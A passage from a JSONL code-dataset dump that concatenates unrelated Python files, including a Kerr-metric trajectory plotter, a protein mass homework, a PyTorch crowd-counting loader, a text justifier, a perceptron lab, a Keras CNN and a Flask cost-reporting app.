\"\"\"Generator that computes factors.\"\"\"\n# k = 1\n# while k * k < num: # while k < sqrt(n)\n# if num % k == 0:\n# yield k\n# yield num // k\n# k += 1\n# if k * k == num:\n# yield k\n for k in range(1, num + 1):\n if num % k == 0:\n yield k\n","sub_path":"Learning Python/2017.10.24-TILs/creativity.py","file_name":"creativity.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"521186824","text":"from __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport sys\nimport glob\nimport scipy.interpolate\n\n\n#Define paths\nPhoton_files = glob.glob('/unsafe/tok2/LocalOutputs/RT/General/vacuum/*.txt') #t, r, theta, phi\nMPD_full = glob.glob('/unsafe/tok2/LocalOutputs/MPD/MPD_whole*.txt') #t,x,y,z\nMPD_section = glob.glob('/unsafe/tok2/LocalOutputs/MPD/MPD_SAVEsection*.txt') #t,x,y,z\n\n#Get sys input parameters\nRT_ID = sys.argv[1]\nMPD_ID = sys.argv[2]\nINTERP_ID = sys.argv[3]\n\n#Set up plotting axes\nfig = plt.figure(figsize=(10,10))\n#ax = fig.add_subplot(111, projection = '3d')\nax = fig.add_subplot(111)\nax.scatter(0,0,c='k')\n\n#ax.scatter(0,0,0,c='r')\n#ax.scatter(0,0,c='k')\ncounter = 0\n#Define plotting functions\ndef plotPHOTON(file):\n\n data=np.loadtxt(file)\n \n print (file)\n \n t = data[:,0]\n r = data[:,1]\n theta = data[:,2]\n phi = data[:,3]\n \n a = 0.998\n m = (r**2 +a**2)**0.5\n\n x =m*np.sin(theta)*np.cos(phi)\n y=m*np.sin(theta)*np.sin(phi)\n z=r*np.cos(theta)\n ax.plot(x,y) \n \n #ax.plot(x,y,z)\n #ax.scatter(x[0],y[0],z[0],c='g')\n\ndef plotMPD(file,counter):\n print ('MPD ', file)\n \n \n data = np.loadtxt(file)\n r = data[:,1]\n theta = data[:,2]\n phi = data[:,3]\n \n a = 0.998\n m = (r**2 +a**2)**0.5\n\n x =m*np.sin(theta)*np.cos(phi)\n y=m*np.sin(theta)*np.sin(phi)\n z=r*np.cos(theta)\n \n if counter == 1:\n ax.scatter(x,y,z)\n print (x[0],y[0],z[0])\n else:\n ax.plot(x,y,z)\n # ax.scatter(x,y,z)\n # ax.scatter(x[0],y[0],z[0], c='g')\n # ax.scatter(x[-1],y[-1],z[-1], c='r')\n \n\n\n\n\n '''\n ax.plot(x,y)\n if counter == 1:\n ax.scatter(x,y)\n else:\n ax.scatter(x,y,c='k')\n\n ax.scatter(x[0],y[0], c='g')\n ax.scatter(x[-1],y[-1], c='r') '''\n # with open('targets.txt','w') as f:\n # for ii in np.arange(len(x)):\n # f.write('time ./a.out '+str(x[ii]) +' '+ str(y[ii]) + ' ' + str(z[ii])+ ' ' +str(counter) + '\\n')\n\n\n#Now do some plotting\nif RT_ID == 'y':\n print ('Ray Tracing plotted')\n for file in Photon_files:\n plotPHOTON(file)\nelse:\n print ('No Ray Tracing plotted')\n\nif MPD_ID == 'y':\n print ('MPD plotted')\n \n for file in MPD_section:\n plotMPD(file,1)\nelse:\n print ('No MPD plotted')\n\n\n\n\n\n#plotMPD(MPD_full[0],0)\n\n\n'''\ndatafile = '/home/tok2/core/RayTracing/saver.txt'\ndata = np.loadtxt(datafile)\nx = data[0]\ny = data[1]\nz = data[2]\nxx = data[3]\nyy = data[4]\nds = data[5]\nax.scatter(x,y,z, c='k')\n'''\n\n\n\n\n\n\n\n#Format trajectory Axes\nlimit = 15\nax.set_xlim(-limit,limit)\nax.set_ylim(-limit,limit)\n#ax.set_zlim(-limit,limit) \nax.set_xlabel('x [M]') \nax.set_ylabel('y [M]') \n#ax.set_zlabel('z [M]') \n\nplt.show()\n","sub_path":"Tools/Plot.py","file_name":"Plot.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"318037151","text":"# BT3051 Assignment 1b\r\n#Roll Number: BE14B002\r\n#Collaborators: BE14B020\r\n#Time: 1:30\r\nimport sys\r\nimport doctest\r\ndef read_fasta(fname):\r\n \"\"\" (str) -> (list of tuples)\r\n # function body with documentation\r\n \"\"\"\r\n seq=[]\r\n sequence_name=[]\r\n sequence=[]\r\n with open(fname) as file:\r\n lines=file.read()\r\n lines=lines.split(\">\")\r\n lines = list(filter(None, lines))\r\n for iseq in lines:\r\n seq.append(iseq.split(\"\\n\"))\r\n for ilist in seq:\r\n sequence_name.append(ilist[0])\r\n sequence.append(\"\".join(ilist[1:len(ilist)]))\r\n sequences=list(zip(sequence_name,sequence))\r\n return sequences # a list of (sequence_name, sequence) tuples\r\n\r\ndef compute_protein_mass(protein_str):\r\n \"\"\"\r\n (str)->(float)\r\n #function body including documentation and test cases\r\n >>> compute_protein_mass('SKADYEK')\r\n 839.407\r\n \"\"\"\r\n with open(\"PROT_MASS.txt\") as file:\r\n weights={'X':0}\r\n mass=0\r\n for lines in file:\r\n lines=lines.split()\r\n weights[lines[0]]=float(lines[1])\r\n for ilet in protein_str:\r\n mass+=weights[ilet]\r\n mass+=18.01528\r\n mass=float(\"%.3f\" %mass)\r\n return mass\r\n\r\nif __name__ == '__main__':\r\n #DO NOT CHANGE THE FOLLOWING STATEMENTS\r\n for seq_name, seq in read_fasta(\"hw1a_dataset.faa\"):\r\n print (seq_name, compute_protein_mass(seq))\r\n\r\nif __name__ == '__main__':\r\n doctest.testmod(verbose = True)\r\n","sub_path":"hw/hw1/hw1a.py","file_name":"hw1a.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"322202574","text":"from datetime import datetime\n\nfrom gamecounter.utils.database import RootDocument, max_length, min_items\n\n\nclass Match(RootDocument):\n __collection__ = \"gamecounter_matches\"\n __database__ = \"gamecounter\"\n\n structure = {\n \"datetime\": datetime,\n \"location\": str,\n \"game\": str,\n \"players\": list,\n \"winner\": str,\n }\n required_fields = [\"datetime\", \"game\", \"players\"]\n validators = {\n \"location\": max_length(100),\n \"game\": max_length(100),\n \"players\": min_items(1),\n \"winner\": max_length(64)\n }\n use_dot_notation = True\n\n def __repr__(self):\n return \"\".format(self.username)\n","sub_path":"gamecounter/matches/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"32006168","text":"from torch.utils.data import Dataset\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nimport cv2\nfrom torchvision import transforms\nimport random\nfrom PIL import Image\nimport glob\n\n\nclass CrowdDataset(Dataset):\n '''\n crowdDataset\n '''\n def __init__(self, img_root, gt_dot_root, split_txt_filepath=None, phase='train', aug=0, normalize=True, fixed_size=-1, max_side=-1):\n '''\n img_root: the root path of images.\n gt_dot_root: the root path of ground-truth dot map.\n phase: train or test\n split_txt_filepath: text file containing list of images to include in the dataset. If none, then use all jpg images in img_root\n '''\n self.img_root=img_root\n self.gt_dot_root=gt_dot_root\n self.phase=phase\n self.split_txt_filepath = split_txt_filepath\n\n if(split_txt_filepath is None):\n self.img_names=[filename for filename in os.listdir(img_root) \\\n if os.path.isfile(os.path.join(img_root,filename))]\n else:\n img_list = np.loadtxt(split_txt_filepath, dtype=str) \n self.img_names=[filename + '.jpg' for filename in img_list[:,0] \\\n if os.path.isfile(os.path.join(img_root,filename+ '.jpg'))]\n\n self.n_samples=len(self.img_names)\n\n self.aug=aug\n self.normalize = normalize;\n self.fixed_size = fixed_size\n self.max_side = max_side\n\n print('self.aug', self.aug)\n print('self.fixed_size', self.fixed_size)\n\n def __len__(self):\n return self.n_samples\n\n def __getitem__(self,index):\n assert index <= len(self), 'index range error'\n img_name=self.img_names[index]\n img=plt.imread(os.path.join(self.img_root,img_name))/255# convert from [0,255] to [0,1]\n \n if len(img.shape)==2: # expand grayscale image to three channel.\n img=img[:,:,np.newaxis]\n img=np.concatenate((img,img,img),2)\n img=img[:,:,0:3]\n\n gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','_gt_dots.npy'));\n if(os.path.isfile(gtdot_path)):\n gt_dot=np.load(gtdot_path)\n else:\n gtdot_path = os.path.join(self.gt_dot_root,img_name.replace('.jpg','.npy'));\n if(os.path.isfile(gtdot_path)):\n gt_dot=np.load(gtdot_path)\n else:\n gt_dot=np.zeros((img.shape[0], img.shape[1]))\n\n \n if random.randint(0,1)==1 and self.phase=='train':\n img=img[:,::-1].copy() # horizontal flip\n gt_dot=gt_dot[:,::-1].copy() # horizontal flip\n \n if(self.phase=='train' and self.max_side > 0):\n h = img.shape[0]\n w = img.shape[1]\n h2 = h\n w2 = w\n crop = False\n if(h > self.max_side):\n h2 = self.max_side\n crop = True\n if(w > self.max_side):\n w2 = self.max_side\n crop = True\n if(crop):\n y=0\n x=0\n if(not (h2 ==h)):\n y = np.random.randint(0, high = h-h2)\n if(not (w2 ==w)):\n x = np.random.randint(0, high = w-w2)\n img = img[y:y+h2, x:x+w2, :]\r\n gt_dot = gt_dot[y:y+h2, x:x+w2]\r\n\n \n if ((self.aug > 0 and self.phase=='train')or (self.fixed_size > 0)):\n i = -1\n img_pil = Image.fromarray(img.astype(np.uint8)*255);\n if(self.fixed_size < 0):\n i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(img.shape[0]//4, img.shape[1]//4))\r\n elif(self.fixed_size < img.shape[0] or self.fixed_size < img.shape[1]):\r\n i, j, h, w = transforms.RandomCrop.get_params(img_pil, output_size=(min(self.fixed_size,img.shape[0]), min(self.fixed_size,img.shape[1])))\r\n #print('i, j, h, w',i, j, h, w)\r\n if(i >= 0):\r\n img = img[i:i+h, j:j+w, :]\r\n gt_dot = gt_dot[i:i+h, j:j+w]\r\n\n\n max_scale = 16\n if max_scale>1: # fix image and gt to match model.\n #ds_rows=int(img.shape[0]//max_scale)*max_scale\n #ds_cols=int(img.shape[1]//max_scale)*max_scale\n #img = img[:ds_rows, :ds_cols, :]\n #gt_dmap = gt_dmap[:ds_rows, :ds_cols]\n #gt_dot = gt_dot[:ds_rows, :ds_cols]\n ds_rows=int(img.shape[0]//max_scale)*max_scale\n ds_cols=int(img.shape[1]//max_scale)*max_scale\n pad_y1 = 0\n pad_y2 = 0\n pad_x1 = 0\n pad_x2 = 0\n if(ds_rows < img.shape[0]):\n pad_y1 = (max_scale - (img.shape[0] - ds_rows))//2\n pad_y2 = (max_scale - (img.shape[0] - ds_rows)) - pad_y1\n if(ds_cols < img.shape[1]):\n pad_x1 = (max_scale - (img.shape[1] - ds_cols))//2\n pad_x2 = (max_scale - (img.shape[1] - ds_cols)) - pad_x1\n img = np.pad(img, ((pad_y1,pad_y2),(pad_x1,pad_x2),(0,0)), 'constant', constant_values=(1,) )# padding constant differs by dataset based on bg color\n gt_dot = np.pad(gt_dot, ((pad_y1,pad_y2),(pad_x1,pad_x2)), 'constant', constant_values=(0,) )# padding constant differs by dataset based on bg color\n\n gt_dot=gt_dot[np.newaxis,:,:]\n gt_dot_tensor=torch.tensor(gt_dot,dtype=torch.float)\n\n img=img.transpose((2,0,1)) # convert to order (channel,rows,cols)\n img_tensor=torch.tensor(img,dtype=torch.float)\n if(self.normalize):\n img_tensor=transforms.functional.normalize(img_tensor,mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n return img_tensor,gt_dot_tensor,img_name\n\n\n","sub_path":"my_dataset_test.py","file_name":"my_dataset_test.py","file_ext":"py","file_size_in_byte":5818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"523304807","text":"#! /usr/bin/python\nimport sys\nimport pdb\n\n# Change the text in file_name such that every line is of length\n# justify_length\ndef justify(file_name, justify_length):\n\tfile = open(file_name,'r+')\n\tnewFileText = \"\"\n\tfor line in file:\n\t\tnewFileText += justifyHelper(line,file,justify_length)\n\tfile.seek(0,0)\n\tfile.write(newFileText)\n\tfile.close()\n\ndef justifyHelper(line, file, justify_length):\n\t# If the line is greater than the justify_length, split off the line\n\t# at the justify length and justify the rest of the line on another line.\n\tif (len(line) > justify_length):\n\t\treturn justifyHelper2(line[0:justify_length - 2] + \"\\n\", file, justify_length) + justifyHelper(line[justify_length - 2:len(line)], file, justify_length)\n\telse:\n\t\treturn justifyHelper2(line, file, justify_length)\n\ndef justifyHelper2(line, file, justify_length):\n\tnumWords = len(line.split())\n\tspacesPerWord = (justify_length - len(line))/(numWords)\n\tnewLine = \"\"\n\twordFound = False\n\twordsFound = 0\n\tspacesAdded = 0\n\tfor letter in line:\n\t\tnewLine += letter\n\t\tif (letter == \"\\n\"):\n\t\t\tbreak\n\t\tif (wordFound == False):\n\t\t\tif (letter != ' '):\n\t\t\t\twordFound = True\n\t\t\t\twordsFound += 1\n\t\tif (wordFound):\n\t\t\tif (letter == ' '):\n\t\t\t\tif (wordsFound == numWords - 1):\n\t\t\t\t\tfor i in range(justify_length - len(line) - spacesAdded):\n\t\t\t\t\t\tnewLine += ' '\n\t\t\t\telse:\n\t\t\t\t\tfor i in range(spacesPerWord):\n\t\t\t\t\t\tnewLine += ' '\n\t\t\t\t\t\tspacesAdded += 1\n\t\t\t\twordFound = False\n\t#pdb.set_trace()\n\t#print \"old: \" + line\n\t#print len(newLine)\n\t#print \"new: \" + newLine\n\t#file.write(newLine)\n\treturn newLine\n\n# Program justifies text contents of a given file\n# This is the actual code that gets run when the\n# program is run. \n#\n# DO NOT EDIT BELOW HERE.\nif __name__ == \"__main__\":\n\n file_name = ''\n length = -1\n\n # Parse command line arguments\n try:\n for i in range(len(sys.argv)):\n if sys.argv[i] == '-f':\n file_name = sys.argv[i+1]\n elif sys.argv[i] == '-l':\n length = int(sys.argv[i+1])\n except:\n exit('Input error. Example input: justifytext -f mytextfile -l 80')\n\n if file_name == '' or length < 1:\n exit('Input error. Example input: justifytext -f mytextfile -l 80')\n \n justify(file_name, length)\n\t\n","sub_path":"justifytext.py","file_name":"justifytext.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"194465819","text":"import math\r\n\r\nn = int(input(\"Type in number of trails \\n >\"))\r\nr = int(input(\"Type in number of successes \\n >\"))\r\np = float(input(\"Type in the probability of success \\n >\"))\r\nNR = n - r\r\nq = 1 - p\r\n\r\nn_factorial = 1\r\nr_factorial = 1\r\nNR_factorial = 1\r\n\r\nif n < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif n == 0:\r\n n_factorial = 1\r\nelse:\r\n for i in range(1,n + 1):\r\n n_factorial = n_factorial*i\r\n\r\n\r\nif r < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif r == 0:\r\n r_factorial = 1\r\nelse:\r\n for i in range(1,r + 1):\r\n r_factorial = r_factorial*i\r\n\r\n\r\nif NR < 0:\r\n print(\"Sorry, factorial does not exist for negative numbers\")\r\nelif NR == 0:\r\n NR_factorial = 1\r\nelse:\r\n for i in range(1,NR + 1):\r\n NR_factorial = NR_factorial*i\r\n \r\n \r\nans = (n_factorial)/(r_factorial*NR_factorial) * (p**r) * (q**NR)\r\n \r\nprint(ans)\r\n \r\n","sub_path":"binomial_distribution.py","file_name":"binomial_distribution.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646101430","text":"__author__ = 'Lev Osipov'\n\nimport numpy as np\nimport pandas as pd\nimport pylab as pl\n\n\ndef f(wghts, vec):\n result = np.dot(wghts, vec)\n if result > 0:\n return 1\n elif result < 0:\n return -1\n else:\n return 0\n\n\ndef iteration(wghts, lrn_rt, tr_classes, tr_data):\n for j in range(0, 10):\n i = np.random.randint(tr_data.shape[0])\n wghts += lrn_rt * (tr_classes[i] - f(wghts, tr_data.iloc[i])) * tr_data.iloc[i]\n\n\ndef test(wghts, data, classes):\n result = 0\n for i in range(0, data.shape[0]):\n if f(wghts, data.iloc[i]) == classes[i]:\n result += 1\n\n return result / float(len(data))\n\n\ntrain_data = pd.read_csv('train.csv')\ntest_data = pd.read_csv('test.csv')\n\ntrain_classes = train_data['class']\ntrain_data = train_data.drop('class', axis=1)\n\ntest_classes = test_data['class']\ntest_data = test_data.drop('class', axis=1)\n\nlearning_rate = 1\nmax_iterations = 100\n\nweights = np.zeros(train_data.shape[1])\nresults = []\nlocal_max = 0\nlocal_max_index = -1\nfor i in range(0, max_iterations):\n if local_max_index + 50 <= i:\n break\n iteration(weights, learning_rate, train_classes, train_data)\n learning_rate *= 0.95\n success_rate = test(weights, test_data, test_classes)\n if local_max < success_rate:\n local_max = success_rate\n local_max_index = i\n results.append([int(i + 1), success_rate])\nresults = np.array(results)\npl.plot(results[:, 0], results[:, 1])\npl.show()\n\n","sub_path":"4 Perceptron/Lab4_Osipov.py","file_name":"Lab4_Osipov.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"139253401","text":"# %%\nimport cv2\nimport h5py\nimport numpy as np\nfrom keras.models import Model, Sequential\nfrom keras.optimizers import Adam\nfrom keras.losses import SparseCategoricalCrossentropy, MeanAbsoluteError, Huber\nfrom keras import layers\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport tensorflow as tf\n\n# %%\nsample_per_second = 2\n\n# Frame per second\nfps = 20\n# Blood volume signal reading per second\nrds = 256\n# Path to pickled data file\npath_to_hdf5 = \"data/data_in/data.hdf5\"\npath_to_video = \"data/data_in/data.avi\"\n\nsignal_sampling_rate = rds // sample_per_second\nframe_sampling_rate = fps // sample_per_second\n\nvideo_capture = cv2.VideoCapture(path_to_video)\nn_frames = int(video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\nresolution = (int(video_capture.get(3)),\n int(video_capture.get(4)))\n\nhdf5_file = h5py.File(path_to_hdf5, 'r')\nbvp_raw = np.array(hdf5_file['pulse'])\n\nsampled_frames_buffer = []\n\nfor frame_number in tqdm(range(n_frames)):\n ret, frame = video_capture.read()\n if frame_number % frame_sampling_rate == 0:\n sampled_frames_buffer.append(frame)\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\nprint(f\"Sampled {len(sampled_frames_buffer)} frames out of {n_frames}.\")\n\nsampled_frames_buffer = np.array(sampled_frames_buffer, dtype=np.float32)\nbvp_raw_sampled = bvp_raw[::signal_sampling_rate]\n\nx_train = sampled_frames_buffer\ny_train = bvp_raw_sampled\n\n# %%\nlogdir = \"logs/train_data/\" + datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nfile_writer = tf.summary.create_file_writer(logdir)\n\n# %%\n\n# model = applications.resnet50.ResNet50(input_shape=x_train.shape[1:])\n# x = model.output\n# x = Dropout(0.7)(x)\n# prediction = Dense(1)(x)\n\n# x_train shape -> (121, 480, 640, 3)\n\nmodel = Sequential()\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1, input_shape=x_train.shape[1:]))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(2, 2)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(15, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Conv2D(64, kernel_size=(12, 10), strides=1))\nmodel.add(layers.MaxPooling2D(pool_size=(15, 10), strides=(1, 1)))\nmodel.add(layers.ELU())\nmodel.add(layers.BatchNormalization())\n\nmodel.add(layers.Flatten())\n# model.add(layers.Conv2D(1, kernel_size=(1, 1), strides=1))\nmodel.add(layers.Dense(1, activation=\"linear\"))\n\nadam = Adam(lr=0.0001)\nmodel.compile(optimizer=adam, loss=Huber(), metrics=['mae'])\nhistory = model.fit(x_train, y_train, epochs=100, batch_size=1)\nmodel.save(f\"model_{datetime.now().strftime('%Y%m%d-%H%M%S')}\")\nhf = h5py.File('history_data.h5', 'w')\nhf.create_dataset('history', data=history)\nhf.close()\n\n","sub_path":"2d_convolution.py","file_name":"2d_convolution.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"498317785","text":"# def string (n):\n# revers_string = n[::-1]\n# return revers_string\n#\n# print (string(\"Cat is my\"))\n\ndef prime_number (n):\n if (n == 1):\n return False\n elif (n == 2):\n return True\n else:\n for x in range(2,n):\n if (n % x == 0):\n return False\n return True\n\nprint(prime_number(1))\n","sub_path":"pages/STRING_REVERS.py","file_name":"STRING_REVERS.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"102252482","text":"\"\"\"\n 3. Utilizando listas faça um programa que faça 5 perguntas para uma pessoa \n sobre um crime. As perguntas são:\n • \"Telefonou para a vítima?\"\n • \"Esteve no local do crime?\"\n • \"Mora perto da vítima?\"\n • \"Devia para a vítima?\"\n • \"Já trabalhou com a vítima?\" \nO programa deve no final emitir uma classificação sobre a participação da pessoa\n no crime. Se a pessoa responder \npositivamente a 2 questões ela deve ser classificada como \"Suspeita\", entre 3 e \n4 como \"Cúmplice\" e 5 como \"Assassino\".\n Caso contrário, ele será classificado como \"Inocente\".\"\"\"\n\nperguntas = [\"Telefonou para vítima? S/N \",\n \"Esteve no local do crime? S/N \", \"Mora perto da vítima? S/N \",\n \"Devia para a vítima? S/N \", \"Já trabalhou com a vítima? S/N \"]\nrespostas = []\n\nfor pergunta in perguntas:\n resposta = input(pergunta).lower()\n if resposta == 's' or resposta == 'n':\n respostas.append(resposta)\n else:\n respostas.clear()\n print(\"Resposta inválida!\")\n break\n\nrespostaSim = respostas.count(\"s\")\n\nif len(respostas) == 0:\n print(\"Nenhuma resposta válida, encerrando.\")\nelse:\n if respostaSim < 2:\n print(\"Você é inocente!\")\n elif respostaSim == 2:\n print(\"Você é suspeito!\")\n elif respostaSim >= 3 and respostaSim <= 4:\n print(\"Você é cúmplice!\")\n elif respostaSim == 5:\n print(\"Você é o Assassino.\")\n","sub_path":"Modulo1/Aula 08 - Listas /Exercicio3.py","file_name":"Exercicio3.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"221285511","text":"from . import home\nfrom flask import render_template, url_for, redirect, session, flash, request\nfrom app.home.forms import LoginForm, RegisterForm, SelectForm, CostForm\nfrom werkzeug.security import generate_password_hash\nfrom app.models import User, Studio, Game, Game_cost, Userlog, Useroplog\nfrom app import db\nfrom uuid import uuid4\nfrom functools import wraps\n\n\ndef admin_login_req(f):\n @wraps(f)\n def decorate_function(*args, **kwargs):\n if not session.__contains__('user') or session[\"user\"] is None:\n return redirect(url_for(\"home.login\", next=request.url))\n return f(*args, **kwargs)\n\n return decorate_function\n\n\n@home.route(\"/\")\n@admin_login_req\ndef index():\n return redirect(url_for(\"home.login\"))\n\n\n@home.route(\"/register/\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegisterForm()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n print(data)\n user = User(\n login_name=data[\"login_name\"],\n real_name=data[\"real_name\"],\n is_online=1,\n phone='null',\n mail='null',\n pwd=generate_password_hash(data[\"pwd\"]),\n uuid=str(uuid4()),\n )\n db.session.add(user)\n db.session.commit()\n flash(\"注册成功,请登录!\", \"ok\")\n return redirect(url_for(\"home.login\"))\n return render_template(\"home/register.html\", form=form)\n\n\n@home.route(\"/login/\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n print(\"hello\")\n data = form.data\n print(data)\n login_name = data[\"account\"]\n pwd = data[\"pwd\"]\n user = User.query.filter_by(login_name=login_name).first()\n confirm = user.check_pwd(pwd)\n if confirm:\n session[\"user\"] = data[\"account\"]\n session[\"user_id\"] = user.id\n ip = request.remote_addr\n userlog = Userlog(\n user_id=user.id,\n ip=ip,\n )\n db.session.add(userlog)\n db.session.commit()\n return redirect(url_for(\"home.report_month\"))\n else:\n flash(\"密码错误,请重新输入!\", \"err\")\n return render_template(\"home/login.html\", form=form)\n\n\n@home.route(\"/choose/\")\ndef choose_game():\n return render_template(\"home/choose_game.html\")\n\n\n@home.route(\"/logout/\")\ndef logout():\n session.pop(\"user\", None)\n return redirect(url_for(\"home.login\"))\n\n\n@home.route(\"/report/month/\", methods=[\"GET\", \"POST\"])\n@admin_login_req\ndef report_month():\n form = SelectForm()\n user = User.query.filter_by(login_name=session[\"user\"]).first()\n # form.game_id.choices = [(v.game_id, v.game_cn) for v in user.user_game]\n # print(\"默认值:\", form.game_id.default)\n # print(form.year_id.default)\n # print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n # print(data)\n game_id = data[\"game_id\"]\n year_id = data[\"year_id\"]\n month_id = data[\"month_id\"]\n else:\n # if len(user.user_game) == 0:\n return \"no game, 请联系管理员\"\n game_id = user.user_game[0].game_id\n year_id = form.year_id.default\n month_id = form.month_id.default\n\n cost = Game_cost.query.filter_by(game_id=game_id).filter_by(year_id=year_id).filter_by(\n month_id=month_id).all()\n cost_dict = {}\n for i in cost:\n cost_dict[i.plat_id] = i.__dict__\n game = Game.query.filter_by(game_id=game_id).first()\n plat_ids = game.plat_ids\n game_cn = game.game_cn\n plat_dict = {}\n for v in plat_ids:\n plat_dict[v.plat_id] = v.plat_cn\n return render_template(\"home/report_month.html\", form=form, cost_dict=cost_dict, plat_dict=plat_dict,\n game_cn=game_cn, game_id=game_id, year_id=year_id, month_id=month_id)\n\n\n@home.route(\"/report/month/edit/\", methods=[\"GET\", \"POST\"])\n@admin_login_req\ndef report_edit():\n url_data = request.args\n print(url_data)\n year_id = url_data.get(\"year_id\")\n month_id = url_data.get(\"month_id\")\n game_id = url_data.get(\"game_id\")\n plat_id = url_data.get(\"plat_id\")\n game_cn = url_data.get(\"game_cn\")\n plat_cn = url_data.get(\"plat_cn\")\n data_dict = dict(\n year_id=url_data.get(\"year_id\"),\n month_id=url_data.get(\"month_id\"),\n game_id=url_data.get(\"game_id\"),\n plat_id=url_data.get(\"plat_id\"),\n game_cn=url_data.get(\"game_cn\"),\n plat_cn=url_data.get(\"plat_cn\"),\n id=url_data.get(\"id\")\n )\n form = CostForm()\n cost = Game_cost.query.filter_by(game_id=game_id).filter_by(year_id=year_id).filter_by(\n month_id=month_id).filter_by(plat_id=plat_id).first()\n print(form.validate_on_submit())\n if form.validate_on_submit():\n data = form.data\n print(form.data)\n print(cost)\n if cost is None:\n new_cost = Game_cost(\n game_id=data_dict[\"game_id\"],\n year_id=data_dict[\"year_id\"],\n month_id=data_dict[\"month_id\"],\n plat_id=data_dict[\"plat_id\"],\n income=data[\"income\"],\n cost_idc=data[\"cost_idc\"],\n cost_flow=data[\"cost_flow\"],\n cost_cdn=data[\"cost_cdn\"],\n ratio=data[\"ratio\"],\n servers_num=data[\"servers_num\"],\n cost_single=data[\"cost_single\"]\n )\n new_cost_dict = dict(\n game_id=data_dict[\"game_id\"],\n year_id=data_dict[\"year_id\"],\n month_id=data_dict[\"month_id\"],\n plat_id=data_dict[\"plat_id\"],\n income=data[\"income\"],\n cost_idc=data[\"cost_idc\"],\n cost_flow=data[\"cost_flow\"],\n cost_cdn=data[\"cost_cdn\"],\n ratio=data[\"ratio\"],\n servers_num=data[\"servers_num\"],\n cost_single=data[\"cost_single\"]\n )\n db.session.add(new_cost)\n reason = \"首次上传【{}】-【{}】-{}年-{}月票房等信息,提交数据如下{}。\".format(data_dict[\"game_cn\"],data_dict[\"plat_cn\"],data_dict[\"year_id\"],data_dict[\"month_id\"], new_cost_dict)\n else:\n new_cost_dict = {}\n old_cost_dict = {}\n if cost.income != data[\"income\"]:\n old_cost_dict[\"income\"] = cost.income\n new_cost_dict[\"income\"] = data[\"income\"]\n cost.income = data[\"income\"]\n if cost.cost_flow != data[\"cost_flow\"]:\n old_cost_dict[\"cost_flow\"] = cost.cost_flow\n new_cost_dict[\"cost_flow\"] = data[\"cost_flow\"]\n cost.cost_flow = data[\"cost_flow\"]\n if cost.cost_cdn != data[\"cost_cdn\"]:\n old_cost_dict[\"cost_cdn\"] = cost.cost_cdn\n new_cost_dict[\"cost_cdn\"] = data[\"cost_cdn\"]\n cost.cost_cdn = data[\"cost_cdn\"]\n if cost.ratio != data[\"ratio\"]:\n old_cost_dict[\"ratio\"] = cost.ratio\n new_cost_dict[\"ratio\"] = data[\"ratio\"]\n cost.ratio = data[\"ratio\"]\n if cost.servers_num != data[\"servers_num\"]:\n old_cost_dict[\"servers_num\"] = cost.servers_num\n new_cost_dict[\"servers_num\"] = data[\"servers_num\"]\n cost.servers_num = data[\"servers_num\"]\n if cost.cost_single != data[\"cost_single\"]:\n old_cost_dict[\"cost_single\"] = cost.cost_single\n new_cost_dict[\"cost_single\"] = data[\"cost_single\"]\n cost.cost_single = data[\"cost_single\"]\n reason = \"修改【{}】-【{}】-{}年-{}月票房等信息;修改前数据如下:{},修改后数据如下:{}。\".format(data_dict[\"game_cn\"],data_dict[\"plat_cn\"],data_dict[\"year_id\"],data_dict[\"month_id\"],old_cost_dict,new_cost_dict)\n db.session.commit()\n 